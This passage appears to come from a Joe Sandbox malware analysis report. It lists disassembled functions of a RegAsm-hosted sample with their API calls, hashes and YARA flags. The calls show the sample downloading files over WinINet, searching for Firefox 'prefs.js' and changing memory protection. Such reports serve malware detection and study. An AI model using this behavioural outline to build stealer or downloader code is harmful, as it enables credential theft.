                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650211449.000000006C7B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650456604.000000006C83E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650533178.000000006C842000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
                                                                                • String ID:
                                                                                • API String ID: 4291168024-0
                                                                                • Opcode ID: 4492659b9ffb6a8940b64069546bdfad7f3d9023486119cefba5596678d0701e
                                                                                • Instruction ID: 3a76c824635acaf9606fe3a72e78363fe3af443b6b9b25d465c201dc007b71a0
                                                                                • Opcode Fuzzy Hash: 4492659b9ffb6a8940b64069546bdfad7f3d9023486119cefba5596678d0701e
                                                                                • Instruction Fuzzy Hash: FCF0D622E20B4497CA30DFB48A451A67770AF7B218F103B3AE84C63621FB3069D8C3D1
                                                                                Function 00411EB8 Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 657COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00411EBD
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 00404DCA: _EH_prolog.MSVCRT ref: 00404DCF
                                                                                  • Part of subcall function 00404DCA: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404E1E
                                                                                  • Part of subcall function 00404DCA: StrCmpCA.SHLWAPI(?), ref: 00404E38
                                                                                  • Part of subcall function 00404DCA: InternetOpenUrlA.WININET(?,00000000,00000000,00000000,-00800100,00000000), ref: 00404E5C
                                                                                  • Part of subcall function 00404DCA: CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00404E7D
                                                                                  • Part of subcall function 00404DCA: InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00404EC8
                                                                                  • Part of subcall function 00404DCA: CloseHandle.KERNEL32(?,?,00000400), ref: 00404EE2
                                                                                  • Part of subcall function 00404DCA: InternetCloseHandle.WININET(00000000), ref: 00404EE9
                                                                                  • Part of subcall function 00404DCA: InternetCloseHandle.WININET(?), ref: 00404EF2
                                                                                  • Part of subcall function 00404DCA: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00404EA4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prologInternetlstrcpy$CloseFileHandle$Openlstrcat$CreateReadWritelstrlen
                                                                                • String ID: B
                                                                                • API String ID: 1244342732-1255198513
                                                                                • Opcode ID: 445673c05ee04e935469998d6e1ad7673640e60efa6b345dae39504cf7bb3895
                                                                                • Instruction ID: 7cb4668c239315be8392dc4a7e389f554ac74aed044ceac891e831ccfcc386df
                                                                                • Opcode Fuzzy Hash: 445673c05ee04e935469998d6e1ad7673640e60efa6b345dae39504cf7bb3895
                                                                                • Instruction Fuzzy Hash: 64529E70904288EADB15EBE4D556BDDBBB49F28308F5040BEE449736C2DB781B4CCB66
                                                                                Function 0040B8AF Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 240COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0040B8B4
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D52
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 0040B463: _EH_prolog.MSVCRT ref: 0040B468
                                                                                  • Part of subcall function 0040B463: FindFirstFileA.KERNEL32(00000000,?,00000000,?,00425F68,?,?,00425C47,?,00000000,?), ref: 0040B4E7
                                                                                  • Part of subcall function 0040B463: StrCmpCA.SHLWAPI(?,00425F6C,?,00000000,?), ref: 0040B50B
                                                                                  • Part of subcall function 0040B463: StrCmpCA.SHLWAPI(?,00425F70,?,00000000,?), ref: 0040B525
                                                                                  • Part of subcall function 0040B463: StrCmpCA.SHLWAPI(?,prefs.js,00000000,?,?,?,00425F74,?,?,00425C4A,?,00000000,?), ref: 0040B5C1
                                                                                  • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$lstrcpy$lstrcat$FileFindFirstFolderPathlstrlen
                                                                                • String ID: \..\
                                                                                • API String ID: 271224408-4220915743
                                                                                • Opcode ID: 2fdf3e075c31b22ca8a354aaf151d811bcf78c1484277b32c5798bb14829cd02
                                                                                • Instruction ID: 6c2274da3a54e78b00ef882603e8e3fe35884a936ae60c4e7c9158b4c67c68f5
                                                                                • Opcode Fuzzy Hash: 2fdf3e075c31b22ca8a354aaf151d811bcf78c1484277b32c5798bb14829cd02
                                                                                • Instruction Fuzzy Hash: DFA15FB1900288AACB14FBE5D556BDDBBB4AF19308F50417EE845736C2DB78170CCBA6
                                                                                Function 00405E09 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 107COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (@
                                                                                • API String ID: 0-1346038526
                                                                                • Opcode ID: 14c096e7427ac56c3ceb53db33e20d9e6aa561a8e8b35fd361e21ef125d2a38f
                                                                                • Instruction ID: a472476b622eda2900000c9113d1a74c1da44a18ff9f30f91f8d3e78ba7694db
                                                                                • Opcode Fuzzy Hash: 14c096e7427ac56c3ceb53db33e20d9e6aa561a8e8b35fd361e21ef125d2a38f
                                                                                • Instruction Fuzzy Hash: 2B4136B190461AAFCF14EF94D9909AFBBB1EB04314F10447FEA05B7391D6789A818F98
                                                                                Function 00405D69 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VirtualProtect.KERNEL32(?,?,00000002,00000002,?,00000000,?,?,00405E98), ref: 00405DE8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 544645111-3916222277
                                                                                • Opcode ID: b6b970fa2179954ca2d24890c2a9fa622aa91f7321e7267b4cd12840a3a9e1b1
                                                                                • Instruction ID: ced7d7a04c1373fcb48adb74aa7fd2d2290691d2abba1c02f51b3daadd827661
                                                                                • Opcode Fuzzy Hash: b6b970fa2179954ca2d24890c2a9fa622aa91f7321e7267b4cd12840a3a9e1b1
                                                                                • Instruction Fuzzy Hash: A7113A71515A0AEBEF20CF94C9887ABB7F5FF04340F6084279541E62C0D7789A85EFA9
                                                                                Function 00411250 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SHFileOperationA.SHELL32(?), ref: 00411289
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileOperation
                                                                                • String ID: ^qA
                                                                                • API String ID: 3080627654-2929517337
                                                                                • Opcode ID: b86a9cf137741d795d42c8fdc09233bf8a42cfbe6d8886dfb6df5f219da20288
                                                                                • Instruction ID: cea7c5b2f21ce40cf92ecfc9ca7a06bfbd61282a3af7cf5c5322f6d4fd748434
                                                                                • Opcode Fuzzy Hash: b86a9cf137741d795d42c8fdc09233bf8a42cfbe6d8886dfb6df5f219da20288
                                                                                • Instruction Fuzzy Hash: BAE0E5B0E0021D9FCB44EFA4E5456EEBBF4FF08308F40806AC509F7240E3B452458BA9
                                                                                Function 004104A2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentHwProfileA.ADVAPI32(?), ref: 004104B3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CurrentProfile
                                                                                • String ID: Unknown
                                                                                • API String ID: 2104809126-1654365787
                                                                                • Opcode ID: 5e10422413539b42bf5c0f3fa128b12628a931a4afcc5f0832f78eb075a7ee3b
                                                                                • Instruction ID: 3d2c3ff73f9fd288211faec72780458d1f3465e1919466c86557ea86080fd633
                                                                                • Opcode Fuzzy Hash: 5e10422413539b42bf5c0f3fa128b12628a931a4afcc5f0832f78eb075a7ee3b
                                                                                • Instruction Fuzzy Hash: 49E01270A0010DFBDB10DBA4DA85FDE77BC6B04348F508525EA45D3181DBB8E649DBA9
                                                                                Function 00410CDD Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00410CE2
                                                                                • GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425C4E,?,?), ref: 00410CF6
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AttributesFileH_prolog
                                                                                • String ID:
                                                                                • API String ID: 3244726999-0
                                                                                • Opcode ID: 9858cde492175e4580259da3237b0586ce143e2643660db7b1ce31a318e284b7
                                                                                • Instruction ID: 23f90a50d93cb2e1358a652bfa6555910aea1ee46ff196ae4cba0ec79dbf811d
                                                                                • Opcode Fuzzy Hash: 9858cde492175e4580259da3237b0586ce143e2643660db7b1ce31a318e284b7
                                                                                • Instruction Fuzzy Hash: BEE09B305005149BC714AFA4E4016CDB720EF05764F10422EE866A25D5C7385B45C684
                                                                                Function 00405A53 Relevance: 2.6, APIs: 2, Instructions: 68memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VirtualAlloc.KERNEL32(?,00000000,00003000,00000040,?,00000000,?,?,00405E55,00000000,00000000), ref: 00405AB2
                                                                                • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040,?,00000000,?,?,00405E55,00000000,00000000), ref: 00405ADE
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 1c251f108aa80a173728c8da74072c4a570c277b0e51025ace0a2ede7004c7e8
                                                                                • Instruction ID: 0100467e13e99263edfc9c933cb68e83bd3c9ecc7dabaf0022702558aaebf942
                                                                                • Opcode Fuzzy Hash: 1c251f108aa80a173728c8da74072c4a570c277b0e51025ace0a2ede7004c7e8
                                                                                • Instruction Fuzzy Hash: 2521AE71700B059BDB24CFB4CC81BABB7F5EB44314F24492AE61AD72D0D278AD408F18
                                                                                Function 0040D3FA Relevance: 1.7, APIs: 1, Instructions: 221COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0040D3FF
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D52
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 00410CDD: _EH_prolog.MSVCRT ref: 00410CE2
                                                                                  • Part of subcall function 00410CDD: GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425C4E,?,?), ref: 00410CF6
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 0040A893: _EH_prolog.MSVCRT ref: 0040A898
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
                                                                                • String ID:
                                                                                • API String ID: 2625060131-0
                                                                                • Opcode ID: 56088f79004cf497bad3f02a7e5291dcc555a9d03921c7f1e9fa0e27b921b9e5
                                                                                • Instruction ID: 500d7c88a2085726728d35326e6952772f3e0e38a46ae67bbb90ee8c45411e9d
                                                                                • Opcode Fuzzy Hash: 56088f79004cf497bad3f02a7e5291dcc555a9d03921c7f1e9fa0e27b921b9e5
                                                                                • Instruction Fuzzy Hash: 53915EB1D0024CEADF15EBE5D952BDEBBB8AF18308F50417EE40573282DA78570C8B66
                                                                                Function 0040A893 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0040A898
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 00409F72: _EH_prolog.MSVCRT ref: 00409F77
                                                                                  • Part of subcall function 00409F72: FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,?,?,00425C06,00000000,-00000020,00000000), ref: 00409FF6
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
